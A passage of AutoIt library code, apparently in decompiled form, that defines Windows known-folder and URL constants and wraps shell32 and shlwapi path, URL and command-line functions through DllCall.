$FOLDERID_SYNCRESULTSFOLDER = "{289A9A43-BE44-4057-A41B-587A76D7E7F9}" GLOBAL CONST $FOLDERID_SYNCSETUPFOLDER = "{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}" GLOBAL CONST $FOLDERID_SYSTEM = "{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}" GLOBAL CONST $FOLDERID_SYSTEMX86 = "{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}" GLOBAL CONST $FOLDERID_TEMPLATES = "{A63293E8-664E-48DB-A079-DF759E0509F7}" GLOBAL CONST $FOLDERID_USERPINNED = "{9E3995AB-1F9C-4F13-B827-48B24B6C7174}" GLOBAL CONST $FOLDERID_USERPROFILES = "{0762D272-C50A-4BB0-A382-697DCD729B80}" GLOBAL CONST $FOLDERID_USERPROGRAMFILES = "{5CD7AEE2-2219-4A67-B85D-6C9CE15660CB}" GLOBAL CONST $FOLDERID_USERPROGRAMFILESCOMMON = "{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}" GLOBAL CONST $FOLDERID_USERSFILES = "{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}" GLOBAL CONST $FOLDERID_USERSLIBRARIES = "{A302545D-DEFF-464B-ABE8-61C8648D939B}" GLOBAL CONST $FOLDERID_VIDEOS = "{18989B1D-99B5-455B-841C-AB7C74E4DDFC}" GLOBAL CONST $FOLDERID_VIDEOSLIBRARY = "{491E922F-5643-4AF4-A7EB-4E7A138D8174}" GLOBAL CONST $FOLDERID_WINDOWS = "{F38BF404-1D43-42F2-9305-67DE0B28FC23}" GLOBAL CONST $KF_FLAG_ALIAS_ONLY = 2147483648 GLOBAL CONST $KF_FLAG_CREATE = 32768 GLOBAL CONST $KF_FLAG_DONT_VERIFY = 16384 GLOBAL CONST $KF_FLAG_DONT_UNEXPAND = 8192 GLOBAL CONST $KF_FLAG_NO_ALIAS = 4096 GLOBAL CONST $KF_FLAG_INIT = 2048 GLOBAL CONST $KF_FLAG_DEFAULT_PATH = 1024 GLOBAL CONST $KF_FLAG_NO_APPCONTAINER_REDIRECTION = 65536 GLOBAL CONST $KF_FLAG_NOT_PARENT_RELATIVE = 512 GLOBAL CONST $KF_FLAG_SIMPLE_IDLIST = 256 GLOBAL CONST $URL_SCHEME_INVALID = + 4294967295 GLOBAL CONST $URL_SCHEME_UNKNOWN = 0 GLOBAL CONST $URL_SCHEME_FTP = 1 GLOBAL CONST $URL_SCHEME_HTTP = 2 GLOBAL CONST $URL_SCHEME_GOPHER = 3 GLOBAL CONST $URL_SCHEME_MAILTO = 4 GLOBAL CONST $URL_SCHEME_NEWS = 5 GLOBAL CONST $URL_SCHEME_NNTP = 6 GLOBAL CONST $URL_SCHEME_TELNET = 7 GLOBAL CONST $URL_SCHEME_WAIS = 8 GLOBAL CONST $URL_SCHEME_FILE = 9 GLOBAL CONST $URL_SCHEME_MK = 10 GLOBAL CONST $URL_SCHEME_HTTPS = 11 GLOBAL CONST $URL_SCHEME_SHELL = 12 GLOBAL CONST $URL_SCHEME_SNEWS = 13 GLOBAL CONST $URL_SCHEME_LOCAL = 14 GLOBAL CONST $URL_SCHEME_JAVASCRIPT = 15 GLOBAL CONST $URL_SCHEME_VBSCRIPT = 16 GLOBAL CONST $URL_SCHEME_ABOUT = 17 GLOBAL CONST $URL_SCHEME_RES = 18 GLOBAL CONST $URL_SCHEME_MSSHELLROOTED = 19 GLOBAL CONST $URL_SCHEME_MSSHELLIDLIST = 20 GLOBAL CONST $URL_SCHEME_MSHELP = 21 GLOBAL CONST $URL_SCHEME_MSSHELLDEVICE = 22 GLOBAL CONST $URL_SCHEME_WILDCARD = 23 GLOBAL CONST $URL_SCHEME_SEARCH_MS = 24 GLOBAL CONST $URL_SCHEME_SEARCH = 25 GLOBAL CONST $URL_SCHEME_KNOWNFOLDER = 26 GLOBAL CONST $GCT_INVALID = 0 GLOBAL CONST $GCT_LFNCHAR = 1 GLOBAL CONST $GCT_SEPARATOR = 8 GLOBAL CONST $GCT_SHORTCHAR = 2 GLOBAL CONST $GCT_WILD = 4 GLOBAL CONST $URL_APPLY_DEFAULT = 1 GLOBAL CONST $URL_APPLY_GUESSSCHEME = 2 GLOBAL CONST $URL_APPLY_GUESSFILE = 4 GLOBAL CONST $URL_APPLY_FORCEAPPLY = 8 GLOBAL CONST $URL_DONT_SIMPLIFY = 134217728 GLOBAL CONST $URL_ESCAPE_AS_UTF8 = 262144 GLOBAL CONST $URL_ESCAPE_PERCENT = 4096 GLOBAL CONST $URL_ESCAPE_SPACES_ONLY = 67108864 GLOBAL CONST $URL_ESCAPE_UNSAFE = 536870912 GLOBAL CONST $URL_NO_META = 134217728 GLOBAL CONST $URL_PLUGGABLE_PROTOCOL = 1073741824 GLOBAL CONST $URL_UNESCAPE = 268435456 GLOBAL CONST $URL_PART_HOSTNAME = 2 GLOBAL CONST $URL_PART_PASSWORD = 4 GLOBAL CONST $URL_PART_PORT = 5 GLOBAL CONST $URL_PART_QUERY = 6 GLOBAL CONST $URL_PART_SCHEME = 1 GLOBAL CONST $URL_PART_USERNAME = 3 GLOBAL CONST $URLIS_APPLIABLE = 4 GLOBAL CONST $URLIS_DIRECTORY = 5 GLOBAL CONST $URLIS_FILEURL = 3 GLOBAL CONST $URLIS_HASQUERY = 6 GLOBAL CONST $URLIS_NOHISTORY = 2 GLOBAL CONST $URLIS_OPAQUE = 1 GLOBAL CONST $URLIS_URL = 0 #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_COMMANDLINETOARGV ($SCMD ) LOCAL $ARESULT [1 ] = [0 ] $SCMD = STRINGSTRIPWS ($SCMD , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF NOT $SCMD THEN RETURN $ARESULT ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "ptr" , "CommandLineToArgvW" , "wstr" , $SCMD , "int*" , 0 ) IF @ERROR OR NOT $ARET [0 ] OR (NOT $ARET [2 ] ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $TPTR = DLLSTRUCTCREATE ("ptr[" & $ARET [2 ] & "]" , $ARET [0 ] ) DIM $ARESULT [$ARET [2 ] + 1 ] = [$ARET [2 ] ] FOR $I = 1 TO $ARET [2 ] $ARESULT [$I ] = _WINAPI_GETSTRING (DLLSTRUCTGETDATA ($TPTR , 1 , $I ) ) NEXT DLLCALL ("kernel32.dll" , "handle" , "LocalFree" , "handle" , $ARET [0 ] ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_ISNAMEINEXPRESSION ($SSTRING , $SPATTERN , $BCASESENSITIVE = FALSE ) IF NOT $BCASESENSITIVE THEN $SPATTERN = STRINGUPPER ($SPATTERN ) LOCAL $TUS1 = __US ($SPATTERN ) LOCAL $TUS2 = __US ($SSTRING ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "boolean" , "RtlIsNameInExpression" , "struct*" , $TUS1 , "struct*" , $TUS2 , "boolean" , NOT $BCASESENSITIVE , "ptr" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PARSEURL ($SURL ) LOCAL $TAGPARSEDURL = "dword Size;ptr Protocol;uint cchProtocol;ptr Suffix;uint cchSuffix;uint Scheme" LOCAL $TPURL = DLLSTRUCTCREATE ($TAGPARSEDURL ) DLLSTRUCTSETDATA ($TPURL , 1 , DLLSTRUCTGETSIZE ($TPURL ) ) LOCAL $TURL = DLLSTRUCTCREATE ("wchar[4096]" ) DLLSTRUCTSETDATA ($TURL , 1 , $SURL ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "ParseURLW" , "struct*" , $TURL , "struct*" , $TPURL ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) LOCAL $ARESULT [3 ] $ARESULT [0 ] = DLLSTRUCTGETDATA (DLLSTRUCTCREATE ("wchar[" & DLLSTRUCTGETDATA ($TPURL , 3 ) & "]" , DLLSTRUCTGETDATA ($TPURL , 2 ) ) , 1 ) $ARESULT [1 ] = DLLSTRUCTGETDATA (DLLSTRUCTCREATE ("wchar[" & DLLSTRUCTGETDATA ($TPURL , 5 ) & "]" , DLLSTRUCTGETDATA ($TPURL , 4 ) ) , 1 ) $ARESULT [2 ] = DLLSTRUCTGETDATA ($TPURL , 6 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_PARSEUSERNAME ($SUSER ) IF NOT __DLL ("credui.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $ARET = DLLCALL ("credui.dll" , "dword" , "CredUIParseUserNameW" , "wstr" , $SUSER , "wstr" , "" , "ulong" , 4096 , "wstr" , "" , "ulong" , 4096 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) SWITCH $ARET [0 ] CASE 0 CASE 1315 IF STRINGSTRIPWS ($SUSER , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $ARET [2 ] = $SUSER $ARET [4 ] = "" ELSE CONTINUECASE ENDIF CASE ELSE RETURN SETERROR (10 , $ARET [0 ] , 0 ) ENDSWITCH LOCAL $ARESULT [2 ] $ARESULT [0 ] = $ARET [4 ] $ARESULT [1 ] = $ARET [2 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_PATHADDBACKSLASH ($SFILEPATH ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[260]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "PathAddBackslashW" , "struct*" , $TPATH ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN DLLSTRUCTGETDATA ($TPATH , 1 ) ENDFUNC FUNC _WINAPI_PATHADDEXTENSION ($SFILEPATH , $SEXT = "" ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[260]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $STYPEOFEXT = "wstr" IF NOT STRINGSTRIPWS ($SEXT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFEXT = "ptr" $SEXT = 0 ENDIF LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathAddExtensionW" , "struct*" , $TPATH , $STYPEOFEXT , $SEXT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETEXTENDED ($ARET [0 ] , DLLSTRUCTGETDATA ($TPATH , 1 ) ) ENDFUNC FUNC _WINAPI_PATHAPPEND ($SFILEPATH , $SMORE ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[260]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathAppendW" , "struct*" , $TPATH , "wstr" , $SMORE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN DLLSTRUCTGETDATA ($TPATH , 1 ) ENDFUNC FUNC _WINAPI_PATHBUILDROOT ($IDRIVE ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "PathBuildRootW" , "wstr" , "" , "int" , $IDRIVE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHCANONICALIZE ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathCanonicalizeW" , "wstr" , "" , "wstr" , $SFILEPATH ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , $SFILEPATH ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHCOMMONPREFIX ($SPATH1 , $SPATH2 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "PathCommonPrefixW" , "wstr" , $SPATH1 , "wstr" , $SPATH2 , "wstr" , "" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETEXTENDED ($ARET [0 ] , $ARET [3 ] ) ENDFUNC FUNC _WINAPI_PATHCOMPACTPATH ($HWND , $SFILEPATH , $IWIDTH = 0 ) IF $IWIDTH < 1 THEN LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) DLLCALL ("user32.dll" , "bool" , "GetClientRect" , "hwnd" , $HWND , "struct*" , $TRECT ) $IWIDTH += DLLSTRUCTGETDATA ($TRECT , "Right" ) - DLLSTRUCTGETDATA ($TRECT , "Left" ) ENDIF LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "GetDC" , "hwnd" , $HWND ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , $SFILEPATH ) LOCAL $HDC = $ARET [0 ] LOCAL CONST $WM_GETFONT = 49 $ARET = DLLCALL ("user32.dll" , "ptr" , "SendMessage" , "hwnd" , $HWND , "uint" , $WM_GETFONT , "wparam" , 0 , "lparam" , 0 ) LOCAL $HBACK = DLLCALL ("gdi32.dll" , "handle" , "SelectObject" , "handle" , $HDC , "handle" , $ARET [0 ] ) LOCAL $IERROR = 0 $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathCompactPathW" , "handle" , $HDC , "wstr" , $SFILEPATH , "int" , $IWIDTH ) IF @ERROR OR NOT $ARET [0 ] THEN $IERROR = @ERROR + 10 DLLCALL ("gdi32.dll" , "handle" , "SelectObject" , "handle" , $HDC , "handle" , $HBACK [0 ] ) DLLCALL ("user32.dll" , "int" , "ReleaseDC" , "hwnd" , $HWND , "handle" , $HDC ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , $SFILEPATH ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_PATHCOMPACTPATHEX ($SFILEPATH , $IMAX ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathCompactPathExW" , "wstr" , "" , "wstr" , $SFILEPATH , "uint" , $IMAX + 1 , "dword" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , $SFILEPATH ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHCREATEFROMURL ($SURL ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "PathCreateFromUrlW" , "wstr" , $SURL , "wstr" , "" , "dword*" , 4096 , "dword" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_PATHFINDEXTENSION ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "wstr" , "PathFindExtensionW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHFINDFILENAME ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "wstr" , "PathFindFileNameW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , $SFILEPATH ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHFINDNEXTCOMPONENT ($SFILEPATH ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($SFILEPATH ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "PathFindNextComponentW" , "struct*" , $TPATH ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN _WINAPI_GETSTRING ($ARET [0 ] ) ENDFUNC FUNC _WINAPI_PATHFINDONPATH (CONST $SFILEPATH , $AEXTRAPATHS = "" , CONST $SPATHDELIMITER = @LF ) LOCAL $IEXTRACOUNT = 0 IF ISSTRING ($AEXTRAPATHS ) THEN IF STRINGLEN ($AEXTRAPATHS ) THEN $AEXTRAPATHS = STRINGSPLIT ($AEXTRAPATHS , $SPATHDELIMITER , $STR_ENTIRESPLIT + $STR_NOCOUNT ) $IEXTRACOUNT = UBOUND ($AEXTRAPATHS , $UBOUND_ROWS ) ENDIF ELSEIF ISARRAY ($AEXTRAPATHS ) THEN $IEXTRACOUNT = UBOUND ($AEXTRAPATHS ) ENDIF LOCAL $TPATHS , $TPATHPTRS IF $IEXTRACOUNT THEN LOCAL $TAGSTRUCT = "" FOR $PATH IN $AEXTRAPATHS $TAGSTRUCT &= "wchar[" & STRINGLEN ($PATH ) + 1 & "];" NEXT $TPATHS = DLLSTRUCTCREATE ($TAGSTRUCT ) $TPATHPTRS = DLLSTRUCTCREATE ("ptr[" & $IEXTRACOUNT + 1 & "]" ) FOR $I = 1 TO $IEXTRACOUNT DLLSTRUCTSETDATA ($TPATHS , $I , $AEXTRAPATHS [$I + 4294967295 ] ) DLLSTRUCTSETDATA ($TPATHPTRS , 1 , DLLSTRUCTGETPTR ($TPATHS , $I ) , $I ) NEXT DLLSTRUCTSETDATA ($TPATHPTRS , 1 , PTR (0 ) , $IEXTRACOUNT + 1 ) ENDIF LOCAL $ARESULT = DLLCALL ("shlwapi.dll" , "bool" , "PathFindOnPathW" , "wstr" , $SFILEPATH , "struct*" , $TPATHPTRS ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , $SFILEPATH ) RETURN $ARESULT [1 ] ENDFUNC FUNC _WINAPI_PATHGETARGS ($SFILEPATH ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($SFILEPATH ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "PathGetArgsW" , "struct*" , $TPATH ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN _WINAPI_GETSTRING ($ARET [0 ] ) ENDFUNC FUNC _WINAPI_PATHGETCHARTYPE ($SCHAR ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "uint" , "PathGetCharTypeW" , "word" , ASCW ($SCHAR ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHGETDRIVENUMBER ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "PathGetDriveNumberW" , "wstr" , $SFILEPATH ) IF @ERROR OR ($ARET [0 ] = + 4294967295 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN CHR ($ARET [0 ] + 65 ) & ":" ENDFUNC FUNC _WINAPI_PATHISCONTENTTYPE ($SFILEPATH , $STYPE ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsContentTypeW" , "wstr" , $SFILEPATH , "wstr" , $STYPE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISEXE ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "PathIsExe" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISFILESPEC ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsFileSpecW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISLFNFILESPEC ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsLFNFileSpecW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISRELATIVE ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsRelativeW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISROOT ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsRootW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISSAMEROOT ($SPATH1 , $SPATH2 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsSameRootW" , "wstr" , $SPATH1 , "wstr" , $SPATH2 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISSYSTEMFOLDER ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsSystemFolderW" , "wstr" , $SFILEPATH , "dword" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISUNC ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsUNCW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISUNCSERVER ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsUNCServerW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISUNCSERVERSHARE ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsUNCServerShareW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHMAKESYSTEMFOLDER ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathMakeSystemFolderW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHMATCHSPEC ($SFILEPATH , $SSPEC ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathMatchSpecW" , "wstr" , $SFILEPATH , "wstr" , $SSPEC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHPARSEICONLOCATION ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "PathParseIconLocationW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $ARESULT [2 ] $ARESULT [0 ] = $ARET [1 ] $ARESULT [1 ] = $ARET [0 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_PATHRELATIVEPATHTO ($SPATHFROM , $BDIRFROM , $SPATHTO , $BDIRTO ) IF $BDIRFROM THEN $BDIRFROM = 16 ENDIF IF $BDIRTO THEN $BDIRTO = 16 ENDIF LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathRelativePathToW" , "wstr" , "" , "wstr" , $SPATHFROM , "dword" , $BDIRFROM , "wstr" , $SPATHTO , "dword" , $BDIRTO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHREMOVEARGS ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "none" , "PathRemoveArgsW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHREMOVEBACKSLASH ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "PathRemoveBackslashW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHREMOVEEXTENSION ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "none" , "PathRemoveExtensionW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHREMOVEFILESPEC ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathRemoveFileSpecW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETEXTENDED ($ARET [0 ] , $ARET [1 ] ) ENDFUNC FUNC _WINAPI_PATHRENAMEEXTENSION ($SFILEPATH , $SEXT ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[260]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathRenameExtensionW" , "struct*" , $TPATH , "wstr" , $SEXT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN DLLSTRUCTGETDATA ($TPATH , 1 ) ENDFUNC FUNC _WINAPI_PATHSEARCHANDQUALIFY ($SFILEPATH , $BEXISTS = FALSE ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathSearchAndQualifyW" , "wstr" , $SFILEPATH , "wstr" , "" , "int" , 4096 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) IF $BEXISTS AND NOT FILEEXISTS ($ARET [2 ] ) THEN RETURN SETERROR (20 , 0 , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_PATHSKIPROOT ($SFILEPATH ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($SFILEPATH ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "PathSkipRootW" , "struct*" , $TPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF NOT $ARET [0 ] THEN RETURN $SFILEPATH RETURN _WINAPI_GETSTRING ($ARET [0 ] ) ENDFUNC FUNC _WINAPI_PATHSTRIPPATH ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "none" , "PathStripPathW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHSTRIPTOROOT ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathStripToRootW" , "wstr" , $SFILEPATH ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHUNDECORATE ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "none" , "PathUndecorateW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHUNEXPANDENVSTRINGS ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathUnExpandEnvStringsW" , "wstr" , $SFILEPATH , "wstr" , "" , "uint" , 4096 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_PATHUNMAKESYSTEMFOLDER ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathUnmakeSystemFolderW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHUNQUOTESPACES ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "none" , "PathUnquoteSpacesW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHYETANOTHERMAKEUNIQUENAME ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "PathYetAnotherMakeUniqueName" , "wstr" , "" , "wstr" , $SFILEPATH , "ptr" , 0 , "ptr" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_SHELLGETIMAGELIST ($BSMALL = FALSE ) LOCAL $PLARGE , $PSMALL , $TPTR = DLLSTRUCTCREATE ("ptr" ) IF $BSMALL THEN $PLARGE = 0 $PSMALL = DLLSTRUCTGETPTR ($TPTR ) ELSE $PLARGE = DLLSTRUCTGETPTR ($TPTR ) $PSMALL = 0 